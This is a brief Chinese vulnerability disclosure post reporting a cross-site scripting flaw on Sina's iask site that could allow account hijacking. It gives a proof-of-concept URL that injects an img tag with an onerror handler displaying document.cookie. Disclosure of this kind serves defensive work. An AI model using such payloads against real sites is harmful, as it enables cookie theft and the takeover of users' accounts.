新浪存在xss导致用户账号被劫持及修复 作者:hack1990 时间:11-01-02 阅读数:542人阅读 详细说明:新浪存在xss导致用户账号被劫持漏洞证明:http://iask.sina.com.cn/?k=<img%20onload=\"lazivip><img%20src=/%20onerror=javascript:alert(document.cookie)> 上一篇:论坛漏洞分析之上传漏洞和暴库漏洞 下一篇:淘宝网TaoBao.Com几处上传过滤不严及修复
